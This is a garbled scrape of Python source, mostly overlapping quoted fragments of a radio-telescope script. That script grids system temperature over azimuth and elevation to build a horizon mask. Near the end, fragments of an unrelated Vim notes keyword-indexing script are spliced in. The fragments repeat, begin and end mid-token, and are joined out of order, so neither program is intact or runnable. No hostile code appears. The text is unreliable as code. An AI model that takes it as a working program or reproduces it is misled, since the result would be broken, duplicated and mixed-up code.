'A1A1' for antenna 1), default is", "i,az in enumerate(np.arange(-90,271,1)): print 'at az %f'%(az,) maskr[i] = az,np.max(elevation) for j,el in", "file\") parser.add_option('-s', '--split', dest='split', action=\"store_true\", metavar='SPLIT', default=False, help=\"Whether to split each horizon plot", "(grid >= opts.temp_limit) maskr = np.zeros((len(np.arange(-90,271,1)),2)) for i,az in enumerate(np.arange(-90,271,1)): print 'at az", "d.scans: azimuth.extend(rad2deg(s.pointing['az'])) elevation.extend(rad2deg(s.pointing['el'])) temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0]))) assert len(azimuth) == len(elevation) == len(temp), \"sizes don't match\"", "range(len(d.scans)): d.scans[i].data = scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma) return d def main(): # Parse command-line options and", "# The +361 is to ensure that the point are well spaced, #this", "data file to reduce') # Load data set gridtemp = [] for filename", "= mask * (grid >= opts.temp_limit) maskr = np.zeros((len(np.arange(-90,271,1)),2)) for i,az in enumerate(np.arange(-90,271,1)):", "\" \"as the T_sys at zenith plus the atmospheric noise contrabution at 10", "each horizon plot in half\") parser.add_option('-z', '--azshift', dest='azshift', type='float', metavar='AZIMUTH_SHIFT', default=45.0, help=\"Degrees to", "for sorting out a boundery condition print \"Completed Gridding the data\" print \"Making", "for filename in args: print 'Loading baseline', opts.baseline, 'from data file', filename d", "help=\"Write out intermediate h5 file\") parser.add_option('-s', '--split', dest='split', action=\"store_true\", metavar='SPLIT', default=False, help=\"Whether to", "parser.add_option('--temp-limit', dest='temp_limit', type='float', default=40.0, help=\"The Tempreture Limit to make the cut-off for the", "degrees azimuth, elevation, temp = [], [], [] for s in d.scans: azimuth.extend(rad2deg(s.pointing['az']))", "for %s' % (opts.baseline,)) #plt.xlabel(az_title) #plt.ylabel(el_title) #plt.ylim(0,15) #plt.title(big_title) #plt.show() if __name__ == \"__main__\":", "opts.temp_limit for grid in gridtemp: mask = mask * (grid >= opts.temp_limit) maskr", "\"Gridding the data\" print \"data shape = \",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist()) print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist()) print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist()) gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(),", "len(temp), \"sizes don't match\" data = (azimuth, elevation, temp) np.array(azimuth)<-89 print \"Gridding the", "azimuth and elevation angle from (azel) target associated with scan, in degrees azimuth,", "parser.add_option('-o', '--output', dest='output', type=\"string\", metavar='OUTPUTFILE', default=None, help=\"Write out intermediate h5 file\") parser.add_option('-s', '--split',", "Gridding the data\" print \"Making the mask\" mask = gridtemp[0] >= opts.temp_limit for", "#!/usr/bin/python # Plot horizon mask import optparse import numpy as np import matplotlib.pyplot", "help=\"Degrees to rotate azimuth window by.\") parser.add_option('--temp-limit', dest='temp_limit', type='float', default=40.0, help=\"The Tempreture Limit", "Extract azimuth and elevation angle from (azel) target associated with scan, in degrees", "if len(d.freqs) > 1: # Only keep main scans (discard slew and cal", "Parse command-line options and arguments parser = 
optparse.OptionParser(usage='%prog [options] <data file> [<data file>", "in half\") parser.add_option('-z', '--azshift', dest='azshift', type='float', metavar='AZIMUTH_SHIFT', default=45.0, help=\"Degrees to rotate azimuth window", "dest='baseline', type=\"string\", metavar='BASELINE', default='A1A1', help=\"Baseline to load (e.g. 'A1A1' for antenna 1), default", "'--azshift', dest='azshift', type='float', metavar='AZIMUTH_SHIFT', default=45.0, help=\"Degrees to rotate azimuth window by.\") parser.add_option('--temp-limit', dest='temp_limit',", "scans (discard slew and cal scans) a d = d.select(freqkeep=range(200, 800)) d =", "np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist()) print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist()) gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1), np.arange(4,16,0.1))) # The +361 is to", "file to reduce') # Load data set gridtemp = [] for filename in", "< 1: raise RuntimeError('Please specify the data file to reduce') # Load data", "import matplotlib.mlab as mlab import scape from katpoint import rad2deg def remove_rfi(d,width=3,sigma=5,axis=1): for", "#plt.plot(maskr[1:,0],maskr[1:,1]) #az_title,el_title,big_title = ('Azimuth (deg)', 'Elevation (deg)', 'Mask for %s' % (opts.baseline,)) #plt.xlabel(az_title)", "model files\") (opts, args) = parser.parse_args() # Check arguments if len(args) < 1:", "azimuth.extend(rad2deg(s.pointing['az'])) elevation.extend(rad2deg(s.pointing['el'])) temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0]))) assert len(azimuth) == len(elevation) == len(temp), \"sizes don't match\" data", "= remove_rfi(d,width=7,sigma=5) d = d.convert_power_to_temperature(min_duration=3, jump_significance=4.0) d = d.select(flagkeep='~nd_on') d = d.select(labelkeep='scan', copy=False)", "channels into one band d.average() # Extract azimuth and elevation angle from (azel)", "enumerate(np.arange(4,16,0.1)): if ~mask.data[j,i] and ~mask.mask[j,i] : maskr[i] = az,el break np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:]) #plt.figure() #plt.subplot(1,", "as plt import matplotlib.mlab as mlab import scape from katpoint import rad2deg def", "'Elevation (deg)', 'Mask for %s' % (opts.baseline,)) #plt.xlabel(az_title) #plt.ylabel(el_title) #plt.ylim(0,15) #plt.title(big_title) #plt.show() if", "'--output', dest='output', type=\"string\", metavar='OUTPUTFILE', default=None, help=\"Write out intermediate h5 file\") parser.add_option('-s', '--split', dest='split',", "noise diode model files\") (opts, args) = parser.parse_args() # Check arguments if len(args)", "help=\"The Tempreture Limit to make the cut-off for the mask. 
This is calculated", "and ~mask.mask[j,i] : maskr[i] = az,el break np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:]) #plt.figure() #plt.subplot(1, 1, 1) #plt.plot(maskr[1:,0],maskr[1:,1])", "The +361 is to ensure that the point are well spaced, #this offset", "data\" print \"data shape = \",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist()) print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist()) print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist()) gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(),", "in file\") parser.add_option('-o', '--output', dest='output', type=\"string\", metavar='OUTPUTFILE', default=None, help=\"Write out intermediate h5 file\")", "h5 file\") parser.add_option('-s', '--split', dest='split', action=\"store_true\", metavar='SPLIT', default=False, help=\"Whether to split each horizon", "specify the data file to reduce') # Load data set gridtemp = []", "arguments parser = optparse.OptionParser(usage='%prog [options] <data file> [<data file> ...]', description='Display a horizon", "default=40.0, help=\"The Tempreture Limit to make the cut-off for the mask. This is", "noise contrabution at 10 degrees\" \"elevation as per R.T. 199 .\") parser.add_option(\"-n\", \"--nd-models\",", "d = d.select(freqkeep=range(200, 800)) d = remove_rfi(d,width=7,sigma=5) d = d.convert_power_to_temperature(min_duration=3, jump_significance=4.0) d =", "Average all frequency channels into one band d.average() # Extract azimuth and elevation", "= ('Azimuth (deg)', 'Elevation (deg)', 'Mask for %s' % (opts.baseline,)) #plt.xlabel(az_title) #plt.ylabel(el_title) #plt.ylim(0,15)", "= optparse.OptionParser(usage='%prog [options] <data file> [<data file> ...]', description='Display a horizon mask from", "rotate azimuth window by.\") parser.add_option('--temp-limit', dest='temp_limit', type='float', default=40.0, help=\"The Tempreture Limit to make", "the mask\" mask = gridtemp[0] >= opts.temp_limit for grid in gridtemp: mask =", "temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0]))) assert len(azimuth) == len(elevation) == len(temp), \"sizes don't match\" data = (azimuth,", "cut-off for the mask. This is calculated \" \"as the T_sys at zenith", "default=False, help=\"Whether to split each horizon plot in half\") parser.add_option('-z', '--azshift', dest='azshift', type='float',", "RuntimeError('Please specify the data file to reduce') # Load data set gridtemp =", "match\" data = (azimuth, elevation, temp) np.array(azimuth)<-89 print \"Gridding the data\" print \"data", "type='float', default=40.0, help=\"The Tempreture Limit to make the cut-off for the mask. This", "args: print 'Loading baseline', opts.baseline, 'from data file', filename d = scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models)", "don't match\" data = (azimuth, elevation, temp) np.array(azimuth)<-89 print \"Gridding the data\" print", "main(): # Parse command-line options and arguments parser = optparse.OptionParser(usage='%prog [options] <data file>", "help=\"Baseline to load (e.g. 
'A1A1' for antenna 1), default is first single-dish baseline", "elevation, temp = [], [], [] for s in d.scans: azimuth.extend(rad2deg(s.pointing['az'])) elevation.extend(rad2deg(s.pointing['el'])) temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0])))", "a d = d.select(freqkeep=range(200, 800)) d = remove_rfi(d,width=7,sigma=5) d = d.convert_power_to_temperature(min_duration=3, jump_significance=4.0) d", "print \"Making the mask\" mask = gridtemp[0] >= opts.temp_limit for grid in gridtemp:", "shape = \",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist()) print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist()) print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist()) gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1), np.arange(4,16,0.1))) #", "'A1A1' for antenna 1), default is first single-dish baseline in file\") parser.add_option('-o', '--output',", "optparse.OptionParser(usage='%prog [options] <data file> [<data file> ...]', description='Display a horizon mask from a", "default=None, help=\"Write out intermediate h5 file\") parser.add_option('-s', '--split', dest='split', action=\"store_true\", metavar='SPLIT', default=False, help=\"Whether", "print 'Loading baseline', opts.baseline, 'from data file', filename d = scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models) if", "half\") parser.add_option('-z', '--azshift', dest='azshift', type='float', metavar='AZIMUTH_SHIFT', default=45.0, help=\"Degrees to rotate azimuth window by.\")", "help=\"Whether to split each horizon plot in half\") parser.add_option('-z', '--azshift', dest='azshift', type='float', metavar='AZIMUTH_SHIFT',", "<data file> [<data file> ...]', description='Display a horizon mask from a set of", "the data\" print \"Making the mask\" mask = gridtemp[0] >= opts.temp_limit for grid", "scape from katpoint import rad2deg def remove_rfi(d,width=3,sigma=5,axis=1): for i in range(len(d.scans)): d.scans[i].data =", "def remove_rfi(d,width=3,sigma=5,axis=1): for i in range(len(d.scans)): d.scans[i].data = scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma) return d def main():", "as mlab import scape from katpoint import rad2deg def remove_rfi(d,width=3,sigma=5,axis=1): for i in", "copy=False) # Average all frequency channels into one band d.average() # Extract azimuth", "np.arange(-90,271,1), np.arange(4,16,0.1))) # The +361 is to ensure that the point are well", "R.T. 
199 .\") parser.add_option(\"-n\", \"--nd-models\", help=\"Name of optional directory containing noise diode model", "199 .\") parser.add_option(\"-n\", \"--nd-models\", help=\"Name of optional directory containing noise diode model files\")", "keep main scans (discard slew and cal scans) a d = d.select(freqkeep=range(200, 800))", "print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist()) gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1), np.arange(4,16,0.1))) # The +361 is to ensure", "baseline=opts.baseline,nd_models=opts.nd_models) if len(d.freqs) > 1: # Only keep main scans (discard slew and", "[options] <data file> [<data file> ...]', description='Display a horizon mask from a set", "data files.') parser.add_option('-a', '--baseline', dest='baseline', type=\"string\", metavar='BASELINE', default='A1A1', help=\"Baseline to load (e.g. 'A1A1'", "data file', filename d = scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models) if len(d.freqs) > 1: # Only", "'Mask for %s' % (opts.baseline,)) #plt.xlabel(az_title) #plt.ylabel(el_title) #plt.ylim(0,15) #plt.title(big_title) #plt.show() if __name__ ==", "return d def main(): # Parse command-line options and arguments parser = optparse.OptionParser(usage='%prog", "matplotlib.pyplot as plt import matplotlib.mlab as mlab import scape from katpoint import rad2deg", "gridtemp[0] >= opts.temp_limit for grid in gridtemp: mask = mask * (grid >=", "Load data set gridtemp = [] for filename in args: print 'Loading baseline',", "file> [<data file> ...]', description='Display a horizon mask from a set of data", "offset is not a problem as it is just for sorting out a", "metavar='BASELINE', default='A1A1', help=\"Baseline to load (e.g. 'A1A1' for antenna 1), default is first", "scan, in degrees azimuth, elevation, temp = [], [], [] for s in", "make the cut-off for the mask. 
This is calculated \" \"as the T_sys", "the data file to reduce') # Load data set gridtemp = [] for", "and arguments parser = optparse.OptionParser(usage='%prog [options] <data file> [<data file> ...]', description='Display a", "~mask.mask[j,i] : maskr[i] = az,el break np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:]) #plt.figure() #plt.subplot(1, 1, 1) #plt.plot(maskr[1:,0],maskr[1:,1]) #az_title,el_title,big_title", "a problem as it is just for sorting out a boundery condition print", ": maskr[i] = az,el break np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:]) #plt.figure() #plt.subplot(1, 1, 1) #plt.plot(maskr[1:,0],maskr[1:,1]) #az_title,el_title,big_title =", "parser.parse_args() # Check arguments if len(args) < 1: raise RuntimeError('Please specify the data", "well spaced, #this offset is not a problem as it is just for", "print \"data shape = \",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist()) print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist()) print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist()) gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1),", "a boundery condition print \"Completed Gridding the data\" print \"Making the mask\" mask", "grid in gridtemp: mask = mask * (grid >= opts.temp_limit) maskr = np.zeros((len(np.arange(-90,271,1)),2))", "[<data file> ...]', description='Display a horizon mask from a set of data files.')", "gridtemp = [] for filename in args: print 'Loading baseline', opts.baseline, 'from data", "to make the cut-off for the mask. This is calculated \" \"as the", "metavar='AZIMUTH_SHIFT', default=45.0, help=\"Degrees to rotate azimuth window by.\") parser.add_option('--temp-limit', dest='temp_limit', type='float', default=40.0, help=\"The", "to load (e.g. 
'A1A1' for antenna 1), default is first single-dish baseline in", "= parser.parse_args() # Check arguments if len(args) < 1: raise RuntimeError('Please specify the", "filename in args: print 'Loading baseline', opts.baseline, 'from data file', filename d =", "d.scans[i].data = scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma) return d def main(): # Parse command-line options and arguments", "\"--nd-models\", help=\"Name of optional directory containing noise diode model files\") (opts, args) =", "j,el in enumerate(np.arange(4,16,0.1)): if ~mask.data[j,i] and ~mask.mask[j,i] : maskr[i] = az,el break np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:])", "maskr[i] = az,el break np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:]) #plt.figure() #plt.subplot(1, 1, 1) #plt.plot(maskr[1:,0],maskr[1:,1]) #az_title,el_title,big_title = ('Azimuth", "the T_sys at zenith plus the atmospheric noise contrabution at 10 degrees\" \"elevation", "import rad2deg def remove_rfi(d,width=3,sigma=5,axis=1): for i in range(len(d.scans)): d.scans[i].data = scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma) return d", "arguments if len(args) < 1: raise RuntimeError('Please specify the data file to reduce')", "mask from a set of data files.') parser.add_option('-a', '--baseline', dest='baseline', type=\"string\", metavar='BASELINE', default='A1A1',", "for grid in gridtemp: mask = mask * (grid >= opts.temp_limit) maskr =", "maskr[i] = az,np.max(elevation) for j,el in enumerate(np.arange(4,16,0.1)): if ~mask.data[j,i] and ~mask.mask[j,i] : maskr[i]", "800)) d = remove_rfi(d,width=7,sigma=5) d = d.convert_power_to_temperature(min_duration=3, jump_significance=4.0) d = d.select(flagkeep='~nd_on') d =", "files.') parser.add_option('-a', '--baseline', dest='baseline', type=\"string\", metavar='BASELINE', default='A1A1', help=\"Baseline to load (e.g. 
'A1A1' for", "i in range(len(d.scans)): d.scans[i].data = scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma) return d def main(): # Parse command-line", "d.select(flagkeep='~nd_on') d = d.select(labelkeep='scan', copy=False) # Average all frequency channels into one band", "= d.select(freqkeep=range(200, 800)) d = remove_rfi(d,width=7,sigma=5) d = d.convert_power_to_temperature(min_duration=3, jump_significance=4.0) d = d.select(flagkeep='~nd_on')", "metavar='SPLIT', default=False, help=\"Whether to split each horizon plot in half\") parser.add_option('-z', '--azshift', dest='azshift',", "np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist()) gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1), np.arange(4,16,0.1))) # The +361 is to ensure that", "#this offset is not a problem as it is just for sorting out", "# Check arguments if len(args) < 1: raise RuntimeError('Please specify the data file", "# Parse command-line options and arguments parser = optparse.OptionParser(usage='%prog [options] <data file> [<data", "in gridtemp: mask = mask * (grid >= opts.temp_limit) maskr = np.zeros((len(np.arange(-90,271,1)),2)) for", "(deg)', 'Elevation (deg)', 'Mask for %s' % (opts.baseline,)) #plt.xlabel(az_title) #plt.ylabel(el_title) #plt.ylim(0,15) #plt.title(big_title) #plt.show()", "in enumerate(np.arange(-90,271,1)): print 'at az %f'%(az,) maskr[i] = az,np.max(elevation) for j,el in enumerate(np.arange(4,16,0.1)):", "metavar='OUTPUTFILE', default=None, help=\"Write out intermediate h5 file\") parser.add_option('-s', '--split', dest='split', action=\"store_true\", metavar='SPLIT', default=False,", "file\") parser.add_option('-o', '--output', dest='output', type=\"string\", metavar='OUTPUTFILE', default=None, help=\"Write out intermediate h5 file\") parser.add_option('-s',", "plot in half\") parser.add_option('-z', '--azshift', dest='azshift', type='float', metavar='AZIMUTH_SHIFT', default=45.0, help=\"Degrees to rotate azimuth", "zenith plus the atmospheric noise contrabution at 10 degrees\" \"elevation as per R.T.", "for the mask. This is calculated \" \"as the T_sys at zenith plus", "len(args) < 1: raise RuntimeError('Please specify the data file to reduce') # Load", "== len(elevation) == len(temp), \"sizes don't match\" data = (azimuth, elevation, temp) np.array(azimuth)<-89", "rad2deg def remove_rfi(d,width=3,sigma=5,axis=1): for i in range(len(d.scans)): d.scans[i].data = scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma) return d def", "'--baseline', dest='baseline', type=\"string\", metavar='BASELINE', default='A1A1', help=\"Baseline to load (e.g. 
'A1A1' for antenna 1),", "1), default is first single-dish baseline in file\") parser.add_option('-o', '--output', dest='output', type=\"string\", metavar='OUTPUTFILE',", "in args: print 'Loading baseline', opts.baseline, 'from data file', filename d = scape.DataSet(filename,", "azimuth, elevation, temp = [], [], [] for s in d.scans: azimuth.extend(rad2deg(s.pointing['az'])) elevation.extend(rad2deg(s.pointing['el']))", "import matplotlib.pyplot as plt import matplotlib.mlab as mlab import scape from katpoint import", "d.select(labelkeep='scan', copy=False) # Average all frequency channels into one band d.average() # Extract", "sorting out a boundery condition print \"Completed Gridding the data\" print \"Making the", "<gh_stars>0 #!/usr/bin/python # Plot horizon mask import optparse import numpy as np import", "first single-dish baseline in file\") parser.add_option('-o', '--output', dest='output', type=\"string\", metavar='OUTPUTFILE', default=None, help=\"Write out", "np.arange(4,16,0.1))) # The +361 is to ensure that the point are well spaced,", "10 degrees\" \"elevation as per R.T. 199 .\") parser.add_option(\"-n\", \"--nd-models\", help=\"Name of optional", "if len(args) < 1: raise RuntimeError('Please specify the data file to reduce') #", "degrees\" \"elevation as per R.T. 199 .\") parser.add_option(\"-n\", \"--nd-models\", help=\"Name of optional directory", "'--split', dest='split', action=\"store_true\", metavar='SPLIT', default=False, help=\"Whether to split each horizon plot in half\")", "the data\" print \"data shape = \",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist()) print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist()) print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist()) gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(),", "mask * (grid >= opts.temp_limit) maskr = np.zeros((len(np.arange(-90,271,1)),2)) for i,az in enumerate(np.arange(-90,271,1)): print", "mask. 
This is calculated \" \"as the T_sys at zenith plus the atmospheric", "out intermediate h5 file\") parser.add_option('-s', '--split', dest='split', action=\"store_true\", metavar='SPLIT', default=False, help=\"Whether to split", "[] for filename in args: print 'Loading baseline', opts.baseline, 'from data file', filename", "baseline', opts.baseline, 'from data file', filename d = scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models) if len(d.freqs) >", "args) = parser.parse_args() # Check arguments if len(args) < 1: raise RuntimeError('Please specify", "import optparse import numpy as np import matplotlib.pyplot as plt import matplotlib.mlab as", "\"data shape = \",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist()) print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist()) print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist()) gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1), np.arange(4,16,0.1)))", "s in d.scans: azimuth.extend(rad2deg(s.pointing['az'])) elevation.extend(rad2deg(s.pointing['el'])) temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0]))) assert len(azimuth) == len(elevation) == len(temp), \"sizes", "scans) a d = d.select(freqkeep=range(200, 800)) d = remove_rfi(d,width=7,sigma=5) d = d.convert_power_to_temperature(min_duration=3, jump_significance=4.0)", "diode model files\") (opts, args) = parser.parse_args() # Check arguments if len(args) <", ".\") parser.add_option(\"-n\", \"--nd-models\", help=\"Name of optional directory containing noise diode model files\") (opts,", "window by.\") parser.add_option('--temp-limit', dest='temp_limit', type='float', default=40.0, help=\"The Tempreture Limit to make the cut-off", "= az,el break np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:]) #plt.figure() #plt.subplot(1, 1, 1) #plt.plot(maskr[1:,0],maskr[1:,1]) #az_title,el_title,big_title = ('Azimuth (deg)',", "opts.temp_limit) maskr = np.zeros((len(np.arange(-90,271,1)),2)) for i,az in enumerate(np.arange(-90,271,1)): print 'at az %f'%(az,) maskr[i]", "a horizon mask from a set of data files.') parser.add_option('-a', '--baseline', dest='baseline', type=\"string\",", "d.average() # Extract azimuth and elevation angle from (azel) target associated with scan,", "#plt.subplot(1, 1, 1) #plt.plot(maskr[1:,0],maskr[1:,1]) #az_title,el_title,big_title = ('Azimuth (deg)', 'Elevation (deg)', 'Mask for %s'", "at 10 degrees\" \"elevation as per R.T. 199 .\") parser.add_option(\"-n\", \"--nd-models\", help=\"Name of", "1: # Only keep main scans (discard slew and cal scans) a d", "into one band d.average() # Extract azimuth and elevation angle from (azel) target", "ensure that the point are well spaced, #this offset is not a problem", "\"as the T_sys at zenith plus the atmospheric noise contrabution at 10 degrees\"", "slew and cal scans) a d = d.select(freqkeep=range(200, 800)) d = remove_rfi(d,width=7,sigma=5) d", "as per R.T. 
199 .\") parser.add_option(\"-n\", \"--nd-models\", help=\"Name of optional directory containing noise", "1) #plt.plot(maskr[1:,0],maskr[1:,1]) #az_title,el_title,big_title = ('Azimuth (deg)', 'Elevation (deg)', 'Mask for %s' % (opts.baseline,))", "scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma) return d def main(): # Parse command-line options and arguments parser =", "[], [] for s in d.scans: azimuth.extend(rad2deg(s.pointing['az'])) elevation.extend(rad2deg(s.pointing['el'])) temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0]))) assert len(azimuth) == len(elevation)", "(azel) target associated with scan, in degrees azimuth, elevation, temp = [], [],", "spaced, #this offset is not a problem as it is just for sorting", "boundery condition print \"Completed Gridding the data\" print \"Making the mask\" mask =", "d.select(freqkeep=range(200, 800)) d = remove_rfi(d,width=7,sigma=5) d = d.convert_power_to_temperature(min_duration=3, jump_significance=4.0) d = d.select(flagkeep='~nd_on') d", "condition print \"Completed Gridding the data\" print \"Making the mask\" mask = gridtemp[0]", "horizon mask from a set of data files.') parser.add_option('-a', '--baseline', dest='baseline', type=\"string\", metavar='BASELINE',", "np.array(azimuth)<-89 print \"Gridding the data\" print \"data shape = \",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist()) print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist()) print", "d = d.select(labelkeep='scan', copy=False) # Average all frequency channels into one band d.average()" ]
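The gridding-and-threshold step is the core of this reduction: irregular (azimuth, elevation, T_sys) samples are interpolated onto a regular grid, the grid is thresholded at the temperature limit, and the lowest clear elevation in each azimuth column becomes the horizon mask. Since matplotlib.mlab.griddata has been removed from recent matplotlib releases, the following is a minimal, self-contained sketch of the same step using scipy.interpolate.griddata instead; the synthetic samples and the 40.0 limit are illustrative assumptions, not values from any real observation.

import numpy as np
from scipy.interpolate import griddata

rng = np.random.default_rng(42)

# Synthetic (azimuth, elevation, system temperature) samples: Tsys jumps
# up below an elevation "horizon" that varies sinusoidally with azimuth.
az_samples = rng.uniform(-90, 270, 5000)
el_samples = rng.uniform(4, 16, 5000)
horizon = 8 + 2 * np.sin(np.radians(az_samples))
tsys = 20.0 + 100.0 * (el_samples < horizon)

# Regular grid matching the script: 1 deg in azimuth, 0.1 deg in elevation.
az_grid = np.arange(-90, 271, 1)
el_grid = np.arange(4, 16, 0.1)
az_mesh, el_mesh = np.meshgrid(az_grid, el_grid)
gridtemp = griddata((az_samples, el_samples), tsys, (az_mesh, el_mesh), method='linear')

# Threshold the gridded temperatures, then walk up each azimuth column and
# record the first elevation that is below the limit (clear of the mask).
temp_limit = 40.0
mask = gridtemp >= temp_limit
maskr = np.zeros((len(az_grid), 2))
for i, az in enumerate(az_grid):
    maskr[i] = az, el_grid[-1]
    for j, el in enumerate(el_grid):
        if np.isfinite(gridtemp[j, i]) and not mask[j, i]:
            maskr[i] = az, el
            break

print(maskr[:5])  # first few (azimuth, horizon elevation) pairs

The scipy call is a swapped-in replacement for mlab.griddata, not part of the original script; it returns NaN outside the convex hull of the samples, which is why the column walk also checks np.isfinite.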
[ "[(k, self.normalize(k)) for k in self.index['keywords']] for usr_kw in keywords: submatches = set()", "return os.path.abspath(os.path.expanduser(path)) def usage(self): print(__doc__.strip()) class Timer: \"\"\"Easy to use timer to keep", "updated automatically during each invocation of the program. Valid options include: -i, --ignore-case", "[ 'ignore-case', 'list=', 'database=', 'notes=', 'encoding=', 'verbose', 'help', ]) except getopt.GetoptError as error:", "to index. for filename, last_modified in notes_on_disk.items(): self.add_note(filename, last_modified) logger.info(\"Updated index in %s\",", "command line option defaults. self.database_file = '~/.vim/misc/notes/index.pickle' self.user_directories = ['~/.vim/misc/notes/user/'] self.character_encoding = 'UTF-8'", "in ('-i', '--ignore-case'): self.case_sensitive = False logger.debug(\"Disabling case sensitivity\") elif opt in ('-l',", "user's notes. It has two advantages over just # using Vim's internal :vimgrep", "searching index in %s\", global_timer) def parse_args(self, argv): \"\"\"Parse the command line arguments.\"\"\"", "def tokenize(self, text): \"\"\"Tokenize a string into a list of normalized, unique keywords.\"\"\"", "# TODO: Only save if necessary. self.save_index(INDEX_FILE_PATH, index) def add_note_to_index(self, index, filename, last_modified):", "self.delete_note(filename) self.add_note(filename, last_modified_on_disk) # Already checked this note, we can forget about it.", "the notes directory.\"\"\" user_directories = self.notes_directories index = self.index # First we find", "last_count = 0 for directory in self.user_directories: print('Scanning', directory) for root, dirs, files", "in decorated[:limit]] print(selection) print(self.encode(u'\\n'.join(selection))) def tokenize(self, text): \"\"\"Tokenize a string into a list", "notes (can be repeated) -e, --encoding=NAME set character encoding of notes -v, --verbose", "Standard library modules. import codecs import fnmatch import getopt import logging import os", "if any(fnmatch.fnmatch(filename, pattern) for pattern in INCLUDE_PATTERNS): abspath = os.path.join(root, filename) notes_on_disk[abspath] =", "index['files'][filename] for kw in index['keywords']: index['keywords'][kw] = [x for x in index['keywords'][kw] if", "for word in needles: submatches = set() for original_db_kw, normalized_db_kw in normalized_db_keywords: if", "x in index['keywords'][kw] if x != filename] def tokenize(self, text: str) -> Set[str]:", "keyword index to disk.\"\"\" save_timer = Timer() with open(self.database_file, 'wb') as handle: pickle.dump(self.index,", "'notes=', 'encoding=', 